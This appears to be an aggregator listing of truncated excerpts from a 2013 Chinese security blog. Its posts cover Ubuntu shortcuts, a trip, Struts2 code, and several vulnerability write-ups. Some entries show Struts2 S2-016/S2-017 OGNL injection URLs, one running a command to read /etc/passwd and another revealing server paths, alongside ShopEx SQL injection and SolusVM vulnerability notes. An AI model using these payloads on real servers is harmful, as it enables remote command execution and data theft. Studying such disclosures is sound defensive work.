Hack1990 - hack1990.com - iick's blog

Latest News:

ubuntu终端常用命令 21 Aug 2013 | 05:27 pm

# ctrl + l - 清屏 # ctrl + c - 终止命令 # ctrl + d - 退出 shell,好像也可以表示EOF # ctrl + z - 将当前进程置于后台,fg还原。 # ctrl + r - 从命令历史中找 # ctrl + a - 光标移到行首 ...

北戴河之旅 9 Aug 2013 | 04:13 pm

7月16号跟对象去北戴河去玩了一趟,实在是不敢恭维北戴河的水 那是一个浑啊,还是南戴河好点,上照 做缆车的时候拍的,我都不晓得什么时候拍下来的,正在四处张望中 ...

shopEx最新版的API注入漏洞分析附利用exp 8 Aug 2013 | 07:55 pm

缺陷文件: \core\api\payment\2.0\api_b2b_2_0_payment_cfg.php \core\api\payment\1.0\api_b2b_2_0_payment_cfg.php 第44行 $data['columns'] 未做过滤导致注入 <?php set_time_limit(0); ob_flush(); ...

Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理 19 Jul 2013 | 06:09 pm

带回显命令执行: http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%...

Struts2 S2-016/S2-017 查看物理路径EXP 19 Jul 2013 | 06:08 pm

http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContex...

Struts2带来好多流量 19 Jul 2013 | 06:01 pm

今天下午上网一看流量,一看900多,吓尿了,以为有人在给我刷 结果一看都是关键字Struts2,Struts2一出洞,流量就多了好多 ...

struts2上传多个文件 下载 配制 代码 19 Jul 2013 | 05:18 pm

页面代码: 注意,我在页面在一个新建的文件夹下(TheNameSpace) [html] <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <%@ taglib prefix="s" uri="/struts-tags" %> ...

struts2远程命令执行漏洞(s2-016) 19 Jul 2013 | 05:15 pm

Struts2的官网在17号上午又公布了一个远程命令执行漏洞,随后各种版本的利用工具满天飞 对于wooyun和某些安全工程师童鞋来说,今天应该是备受压力和煎熬的一天 关于这次struts2远程命令执行漏洞(s2-016),官方是这样描述这个漏洞产生原因的: Struts2的DefaultActionMapper支持一种方法,可以使用”action:”, “redirect:” , “re.....

php检测图片木马代码 8 Jul 2013 | 05:46 pm

/** +------------------------------------------------------------------------------ * Upload 文件上传类 ...

SolusVM 1.13.03 Vulnerabilities 8 Jul 2013 | 05:39 pm

/centralbackup.php: <?php if ($_POST['delete']) { $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true); #[...] if ($xc[status] == 'failed') { ...

Recently parsed news:

Recent searches: